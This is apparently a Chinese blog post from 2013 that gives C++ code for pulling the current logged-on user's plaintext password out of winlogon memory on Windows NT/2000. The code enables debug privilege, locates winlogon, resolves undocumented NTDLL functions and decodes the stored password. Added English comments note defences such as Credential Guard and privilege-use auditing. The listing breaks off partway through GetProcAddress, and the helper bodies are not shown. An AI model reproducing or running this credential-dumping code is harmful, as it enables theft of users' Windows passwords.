
C++中获取WinNT/Win2k当前用户名和密码

2013年04月28日03:40 阅读: 12818 次

    // 获取WinNT/Win2k当前用户名和密码,调用以下函数即可:
    // bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
    //---------------------------------------------------------------------------
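    // Mirror of the native UNICODE_STRING: a counted UTF-16 buffer that is not
    // required to be NUL-terminated. In the documented Win32 type, Length and
    // MaximumLength are byte counts, not character counts — treat them that way
    // before copying Buffer anywhere. (`struct` is the keyword; the original
    // text had it mangled by the site's auto-capitalisation.)
    typedef struct _UNICODE_STRING
    {
        USHORT Length;          // bytes in use in Buffer
        USHORT MaximumLength;   // bytes allocated for Buffer
        PWSTR Buffer;           // not guaranteed to end in L'\0'
    }UNICODE_STRING, *PUNICODE_STRING;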
    // Per-handle record as the code expects pfnNtQuerySystemInformation to hand
    // back. The field names are the author's, and the layout is an undocumented
    // NT-internal one: every field is fixed at 16/32 bits, so it can only be
    // plausible for a 32-bit (x86) process image — on 64-bit Windows the real
    // structure carries pointer-sized fields (hedged; confirm per OS build).
    typedef struct _QUERY_SYSTEM_INFORMATION
    {
        DWORD GrantedAccess;   // presumably the access mask granted on the handle
        DWORD PID;             // owning process id (matched against FindWinLogon's result — confirm, caller not on this page)
        WORD HandleType;       // NOTE(review): object-type index; numbering is version-specific
        WORD HandleId;         // presumably the handle value in the owning process
        DWORD Handle;          // meaning not derivable from this page
    }QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION;
    // Header the author expects in the buffer filled by
    // pfnRtlQueryProcessDebugInformation; presumably Count PROCESS_INFO entries
    // follow it (the reading code is not on this page — confirm there). Unk04 and
    // Unk08 are unknown padding/reserved words by the author's own naming; do not
    // repurpose them.
    typedef struct _PROCESS_INFO_HEADER
    {
        DWORD Count;
        DWORD Unk04;
        DWORD Unk08;
    }PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER;
    // One entry following PROCESS_INFO_HEADER. Going by the names, LoadAddress
    // and Size describe a mapped image and Name its path; both are unverified
    // here. LoadAddress is a DWORD, so this layout is 32-bit only.
    typedef struct _PROCESS_INFO
    {
        DWORD LoadAddress;
        DWORD Size;
        DWORD Unk08;
        DWORD Enumerator;
        DWORD Unk10;
        char Name [0x108];   // fixed 264-byte narrow buffer; nothing here guarantees a terminator, so read it with a bounded copy
    }PROCESS_INFO, *PPROCESS_INFO;
    // Record the code reads out of another process's memory (see the
    // LocatePasswordPage* prototypes). As the names say, the credential sits in
    // EncodedPassword under a reversible encoding, not a hash: the callback
    // typedef'd as PFNTRTLRUNDECODEUNICODESTRING takes a BYTE seed, for which
    // HashByte is presumably the source (confirm in the decode path, not on this
    // page). From a defender's view this is the exposure the whole listing
    // depends on — a process that can enable debug privilege and read winlogon's
    // memory recovers the plaintext. On current Windows, LSA protection (RunAsPPL)
    // and Credential Guard remove this class of read, and privilege-use auditing
    // on debug privilege is the detection hook.
    typedef struct _ENCODED_PASSWORD_INFO
    {
        DWORD HashByte;
        DWORD Unk04;
        DWORD Unk08;
        DWORD Unk0C;
        FILETIME LoggedOn;   // logon timestamp by name; untested here
        DWORD Unk18;
        DWORD Unk1C;
        DWORD Unk20;
        DWORD Unk24;
        DWORD Unk28;
        UNICODE_STRING EncodedPassword;   // Length is in bytes; Buffer may not be NUL-terminated
    }ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO;

    // Pointer types for the five NTDLL.DLL exports that GetPassword resolves with
    // GetProcAddress. None has a public header in this listing, hence the
    // hand-written signatures. __stdcall and the DWORD-wide arguments pin them to
    // 32-bit x86; the real x64 signatures use ULONG/pointer-sized types, so these
    // would be wrong there. The Rtl*DebugBuffer/RunDecode functions are
    // undocumented and version-specific, as are the struct layouts above.
    typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION)  (DWORD, PVOID, DWORD, PDWORD);   // (information class, out buffer, buffer length, out returned length)
    typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD);   // returns a buffer that must be released through PFNRTLDESTROYQUERYDEBUGBUFFER
    typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID);   // presumably (pid, flags, debug buffer) — confirm at the call site
    typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID);
    typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING)  (BYTE, PUNICODE_STRING);   // (seed byte, string) — presumably decodes in place

    // Private Prototypes
    BOOL IsWinNT(void);               // OS gate: GetPassword returns false unless one of these holds
    BOOL IsWin2K(void);
    BOOL AddDebugPrivilege(void);     // enables the debug privilege for this process (presumably SeDebugPrivilege); this is the step that privilege-use auditing records
    DWORD FindWinLogon(void);         // presumably returns winlogon's pid (compare QUERY_SYSTEM_INFORMATION.PID); failure value not visible on this page
    BOOL LocatePasswordPageWinNT(DWORD, PDWORD);   // presumably (pid, out address); bodies are not on this page
    BOOL LocatePasswordPageWin2K(DWORD, PDWORD);
    void ReturnWinNTPwd(String &, String &, String &);   // fills (domain, user, password) in the same order as GetPassword's parameters — confirm
    void ReturnWin2kPwd(String &, String &, String &);
    bool GetPassword(String &, String &, String &);      // public entry point; definition follows

    // Global Variables
    // Resolved NTDLL entry points. They are NULL until GetPassword assigns them
    // from GetProcAddress; the visible part of GetPassword does not check any of
    // them (or hNtDll) for NULL before use — a missing export on another OS build
    // would then crash rather than fail cleanly.
    PFNNTQUERYSYSTEMINFORMATION        pfnNtQuerySystemInformation;
    PFNRTLCREATEQUERYDEBUGBUFFER       pfnRtlCreateQueryDebugBuffer;
    PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation;
    PFNRTLDESTROYQUERYDEBUGBUFFER      pfnRtlDestroyQueryDebugBuffer;
    PFNTRTLRUNDECODEUNICODESTRING      pfnRtlRunDecodeUnicodeString;

    // Working state for the search. pvPwd/pvRealPwd end up pointing at recovered
    // credential material and the two arrays hold the account/domain names; none
    // of it is cleared anywhere on this page (SecureZeroMemory is the Win32 call
    // for that), so the secret stays in this process's memory after use.
    DWORD dwPwdLen = 0;
    PVOID pvRealPwd = NULL;
    PVOID pvPwd = NULL;
    DWORD dwHashByte = 0;                // presumably copied from ENCODED_PASSWORD_INFO.HashByte — confirm
    wchar_t wszUserName[0x400];          // 1024 wide chars (2 KiB); any copy into it must be bounded
    wchar_t wszUserDomain[0x400];
    //---------------------------------------------------------------------------
    bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
    {
            if(!IsWinNT() && !IsWin2K())
        {
            // 只适合于2000或者XP
            return false;
        }
        // Add debug privilege to PasswordReminder -
        // this is needed for the search for Winlogon.
        if(!AddDebugPrivilege())
        {
            // 不能够添加debug特权
            return false;
        }
        // debug特权已经成功加入到本程序
        HINSTANCE hNtDll = LoadLibrary("NTDLL.DLL");
        pfnNtQuerySystemInformation = (PFNNTQUERYSYSTEMINFORMATION)
                GetProcAddress(hNtDll,"NtQuerySystemInformation");
        pfnRtlCreateQueryDebugBuffer = (PFNRTLCREATEQUERYDEBUGBUFFER)
                GetProcAddress(hNtDll,"RtlCreateQueryDebugBuffer");
        pfnRtlQueryProcessDebugInformation =(PFNRTLQUERYPROCESSDEBUGINFORMATION)
                GetProcAddress(hNtDll,"RtlQueryProcessDebugInformation");
        pfnRtlDestroyQueryDebugBuffer =    (PFNRTLDESTROYQUERYDEBUGBUFFER)
                GetProcAddress(hNtDll,"RtlDestroyQueryDebugBuffer");
        pfnRtlRunDecodeUnicodeString =(PFNTRTLRUNDECODEUNICODESTRING)
                GetProcAddress(hNtDll,"RtlRunDecodeUnicodeString
